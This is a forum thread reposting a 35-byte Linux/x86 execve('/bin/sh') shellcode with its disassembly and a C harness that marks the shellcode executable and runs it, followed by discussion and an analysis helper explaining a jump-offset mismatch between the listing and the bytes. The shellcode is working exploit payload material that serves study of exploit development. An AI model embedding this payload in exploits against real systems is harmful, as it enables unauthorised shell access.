Aerosol Posted May 4, 2015

/*
; Title: Linux/x86 execve "/bin/sh" - shellcode 35 bytes
; Platform: linux/x86_64
; Date: 2014-06-26
; Author: Mohammad Reza Espargham
; Simple ShellCode

section .text

08048060 <_start>:
 8048060: eb 17                jmp    8048079
08048062:
 8048062: 5e                   pop    %esi
 8048063: 31 d2                xor    %edx,%edx
 8048065: 52                   push   %edx
 8048066: 56                   push   %esi
 8048067: 89 e1                mov    %esp,%ecx
 8048069: 89 f3                mov    %esi,%ebx
 804806b: 31 c0                xor    %eax,%eax
 804806d: b0 0b                mov    $0xb,%al
 804806f: cd 80                int    $0x80
 8048071: 31 db                xor    %ebx,%ebx
 8048073: 31 c0                xor    %eax,%eax
 8048075: 40                   inc    %eax
 8048076: cd 80                int    $0x80
08048078:
 8048078: e8 e5 ff ff ff       call   8048062
 804807d: 2f                   das
 804807e: 62 69 6e             bound  %ebp,0x6e(%ecx)
 8048081: 2f                   das
 8048082: 73 68                jae    80480ec
*/

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>

#define PAGE_SIZE 4096

unsigned char code[] = {
    "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd"
    "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68"
};

int main() {
    printf("Shellcode Length: %d\n", (int)strlen((const char *)code));

    /* code[] lives in the (normally non-executable) data segment; mark the
       page(s) holding it RWX before jumping into it, otherwise the call faults */
    uintptr_t page = (uintptr_t)code & ~(uintptr_t)(PAGE_SIZE - 1);
    if (mprotect((void *)page, PAGE_SIZE * 2, PROT_READ | PROT_WRITE | PROT_EXEC) != 0) {
        perror("mprotect");
        return 1;
    }

    int (*ret)() = (int (*)())code;
    ret();
    return 0;
}
Gushterul Posted May 4, 2015

(not that anyone would be smart enough to actually use them...)
jmp 8048079 ?
Nytro Posted May 4, 2015

It's relative. The opcode "eb 17" == "jump 0x17 bytes".
8048062 (the next address) + 0x17 == 8048079.
It's odd that it is "jmp 8048079" and not "jmp 08048078", because at "08048078" sits the call that pushes "/bin/sh" onto the stack.

Ah, damn. If you look at the shellcode in the C program: \xeb\x16\x5e\x31
That is "eb 16", i.e. "jmp 08048078".
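To make the offset arithmetic from the thread checkable, here is an added analysis helper (not part of the original post or the shellcode author's code) that resolves EB rel8 jumps and E8 rel32 calls the way a disassembler does, and recognises the jmp/call/pop get-PC idiom so the pushed string can be located. The byte array is a copy of the C program's bytes; the 0x08048060 base address is taken from the listing.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Copy of the bytes from the C program above (the "eb 16" variant). */
static const uint8_t sc[] = {
    0xeb,0x16,0x5e,0x31,0xd2,0x52,0x56,0x89,0xe1,0x89,0xf3,0x31,0xc0,0xb0,0x0b,0xcd,
    0x80,0x31,0xdb,0x31,0xc0,0x40,0xcd,0x80,0xe8,0xe5,0xff,0xff,0xff,0x2f,0x62,0x69,
    0x6e,0x2f,0x73,0x68
};
/* Constructed 2-byte variant matching the listing's "eb 17". */
static const uint8_t jmp17[2] = { 0xeb, 0x17 };

/* Target of a short jmp (EB rel8) at offset 'off' in a buffer loaded at 'base'.
   rel8 is signed and relative to the address of the NEXT instruction (off + 2). */
uint32_t jmp_short_target(const uint8_t *buf, size_t off, uint32_t base) {
    int8_t rel = (int8_t)buf[off + 1];
    return base + (uint32_t)(off + 2) + (uint32_t)(int32_t)rel;
}

/* Target of a near call (E8 rel32): signed little-endian rel32, relative to off + 5. */
uint32_t call_rel32_target(const uint8_t *buf, size_t off, uint32_t base) {
    uint32_t raw = (uint32_t)buf[off + 1] | (uint32_t)buf[off + 2] << 8 |
                   (uint32_t)buf[off + 3] << 16 | (uint32_t)buf[off + 4] << 24;
    return base + (uint32_t)(off + 5) + raw;   /* unsigned add wraps like signed */
}

/* Recognise the jmp -> call -> pop get-PC idiom: the short jmp at offset 0 must land
   on an E8 call whose target is the instruction right after the jmp, and that
   instruction must be a pop r32 (0x58..0x5f). Returns the offset of the data the
   call "pushes" (the bytes after the call), or 0 when the pattern is absent. */
size_t jmp_call_pop_data_offset(const uint8_t *buf, size_t len) {
    if (len < 2 || buf[0] != 0xeb) return 0;
    uint32_t call_off = jmp_short_target(buf, 0, 0);        /* base 0 -> offset */
    if ((size_t)call_off + 5 > len || buf[call_off] != 0xe8) return 0;
    uint32_t pop_off = call_rel32_target(buf, call_off, 0);
    if (pop_off != 2 || buf[pop_off] < 0x58 || buf[pop_off] > 0x5f) return 0;
    return (size_t)call_off + 5;
}

int main(void) {
    const uint32_t base = 0x08048060u;
    printf("eb 16 jmp -> %#x, eb 17 jmp -> %#x\n",
           jmp_short_target(sc, 0, base), jmp_short_target(jmp17, 0, base));
    size_t d = jmp_call_pop_data_offset(sc, sizeof sc);
    printf("call at +0x%x -> %#x, data at +%zu: %.7s\n", jmp_short_target(sc, 0, 0),
           call_rel32_target(sc, jmp_short_target(sc, 0, 0), base), d, (const char *)sc + d);
    return 0;
}
```

With the C program's bytes the jmp resolves to 0x08048078 (the call), the call resolves back to 0x08048062 (the pop), and the pushed data starts at offset 29, where "/bin/sh" begins; the listing's "eb 17" instead lands at 0x08048079, one byte into the call, which is the discrepancy the thread is about.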